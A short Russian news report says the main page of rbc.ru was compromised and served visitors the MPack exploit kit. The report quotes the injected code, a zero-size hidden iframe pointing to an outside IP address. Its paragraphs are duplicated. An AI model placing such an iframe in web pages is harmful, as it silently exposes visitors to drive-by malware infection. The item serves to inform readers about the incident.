Сайт Rbc.ru распространял опасный троян
Сайт Rbc.ru распространял опасный троян
Alexander Antipov
Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.
Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.
При детальном анализе оказалось, что на главной странице сайта содержался код
<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe> ,
загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта.
При детальном анализе оказалось, что на главной странице сайта содержался код
<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe> ,
загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта.